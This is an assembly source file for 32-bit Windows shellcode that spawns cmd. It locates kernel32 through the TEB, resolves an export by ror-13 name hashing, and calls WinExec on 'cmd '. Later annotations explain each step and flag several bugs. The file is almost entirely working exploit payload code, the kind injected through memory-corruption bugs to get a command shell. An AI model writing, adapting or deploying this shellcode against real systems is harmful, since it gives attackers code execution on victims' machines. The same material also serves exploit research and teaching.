;Platform independent WinExec CMD spawning ShellCode
;nasm -f bin -o winexec.s winexec.asm
;Written by Pranay Kanwar <warl0ck[at]metaeye.org>

	bits 32

	; ---------------------------------------------------------------
	; Entry point of the blob. Scratch area addressed through esi:
	;   [esi]    = kernel32 image base (returned by FK32)
	;   [esi+4]  = address of the export resolved by LGetProcAddress
	;   [esi+8]  = "cmd " command line (see the note at the store below)
	; No frame, no callee-saved discipline: eax, ebx, esi are clobbered.
	; ---------------------------------------------------------------
	sub sp,40      ; reserve scratch space. NOTE(review): 16-bit operand size,
	               ; so this adjusts sp (low half of esp) only — verify intent
	mov esi,esp    ; esi = base of the scratch area
	
	
	call FK32      ; eax = kernel32.dll base (TEB stack-base probe + 'MZ' scan)
	mov [esi],eax  ; keep the base at [esi]
        
	mov ebx, [esi] ; second argument of LGetProcAddress: module base
	push ebx 
	
	mov ebx,0x0e8afe98 ; first argument: ror-13/add hash of the export name.
	                   ; The original comment said "GetProcAddress", but the
	                   ; resolved address is later called with WinExec's argument
	                   ; shape (cmd line, show flag) and the file header says
	                   ; WinExec — presumably this is WinExec's hash; not verified here.
	push ebx
    	call LGetProcAddress
	mov [esi+4],eax  ; resolved export address; 0 when not found — never checked
	
	xor ebx,ebx
	inc ebx
	push ebx       ; second call argument = 1 (uCmdShow; SW_SHOWNORMAL in Win32 naming)
	
	mov dword [esi+8],0x020646d63 ; "cmd " little-endian: 0x63 'c', 0x6d 'm', 0x64 'd', 0x20 ' '.
	                              ; No NUL terminator is written by this code; the string
	                              ; ends at whatever zero byte happens to follow on the stack.
	lea ebx,[esi+8]
	push ebx       ; first call argument = pointer to "cmd "
	
	call [esi+4]   ; call the resolved export(lpCmdLine, 1); stdcall, callee pops both args
	jmp TheEnd     ; TheEnd is the last label of the file: execution runs off the end of the blob
	

FK32:
	; Locate the kernel32.dll image base without using any import.
	; In:    nothing (the caller pushes no argument)
	; Out:   eax = first 64K-aligned address at/below the probed value
	;              whose first word is 'MZ'
	; Clobb: eax, flags; esi is saved and restored.
	;        `ret 4` discards one extra dword from the caller's stack even
	;        though no argument was pushed — the caller relies on that offset.
	push esi
	xor esi, esi
	mov esi,[fs:esi + 0x18]  ; fs:[0x18] = TEB self-pointer
	lodsd                    ; eax = [TEB+0x00] (discarded); esi += 4
	lodsd                    ; eax = [TEB+0x04] = NtTib.StackBase
	mov eax,[eax - 0x1c]     ; dword just below the stack base. Presumably a return
	                         ; address inside kernel32 (thread start) on the Windows
	                         ; builds this targets — version dependent, not guaranteed.
__loop:
	dec eax                  ; step into the previous 64K block ...
	xor ax, ax               ; ... and align down to it (low 16 bits cleared)
	cmp word [eax], 0x5a4d   ; 'MZ' DOS header magic?
	jne  __loop              ; unchecked downward scan: faults if no header precedes unmapped memory
	pop esi
	ret 4

LGetProcAddress:
	; Resolve an export of a loaded PE image by hashing its export names.
	; Stack on entry (two dwords pushed by the caller):
	;   [esp+4]  = hash  (ror-13/add hash of the export name)
	;   [esp+8]  = base  (image base of the module to search)
	; After the four pushes below these are at [esp+20] and [esp+24].
	; Out:   eax = VA of the export, or 0 if no name hashes to `hash`
	;        edx = module base (left behind by LDone; the caller ignores it)
	; Clobb: ecx, edx, flags; ebx, ebp, esi, edi are preserved.
	;        `ret 4` releases only ONE of the two argument dwords; the other
	;        is still at [esp] when the caller resumes.
	push ebx
	push ebp
	push esi
	push edi
	mov ebp, [esp + 24]			; ebp = module base
	mov eax, [ebp + 0x3c]		; eax = e_lfanew (offset of the PE header)
	mov edx, [ebp + eax + 120]  ; DataDirectory[EXPORT].VirtualAddress (PE header + 0x78)
	add edx, ebp				; edx = IMAGE_EXPORT_DIRECTORY*
	mov ecx, [edx + 24]			; ecx = NumberOfNames
	mov ebx, [edx + 32]         ; AddressOfNames RVA
	add ebx, ebp                ; ebx = array of name RVAs

LFnlp:

	jecxz	LNtfnd              ; every name examined -> not found
	dec ecx                     ; walk the name table from the last entry downwards
	mov esi, [ebx + ecx * 4]    ; RVA of name[ecx]
	add esi, ebp				; esi = name string
	xor edi, edi	            ; edi = running hash
	cld                         ; lodsb must advance forwards

LHshlp:

	xor eax, eax                ; also zeroes ah, which serves as the terminator compare value
	lodsb                       ; al = next name byte
	cmp al, ah                  ; NUL reached? (ah == 0)
	je LFnd
	ror edi, 13                 ; hash = ror(hash, 13) + byte
	add edi, eax
	jmp short LHshlp

LFnd:
	
	cmp edi, [esp + 20]         ; compare with the requested hash
	jnz LFnlp                   ; mismatch: try the next name
	mov ebx, [edx + 36]			; AddressOfNameOrdinals RVA
	add ebx, ebp
	mov cx, [ebx + 2 * ecx]		; cx = ordinal[ecx]; only the low 16 bits of ecx are replaced
	mov ebx, [edx + 28]			; AddressOfFunctions RVA
	add ebx, ebp
	mov eax, [ebx + 4 * ecx]	; RVA of the function at that ordinal
	add eax, ebp                ; -> VA; no check for forwarded exports
	jmp short LDone

LNtfnd:

	xor eax, eax                ; not found -> 0

LDone:
	mov edx, ebp                ; edx = module base (side output)
	pop edi
	pop esi
	pop ebp
	pop ebx
	ret 4                       ; pops one argument dword only (see header note)
TheEnd:
	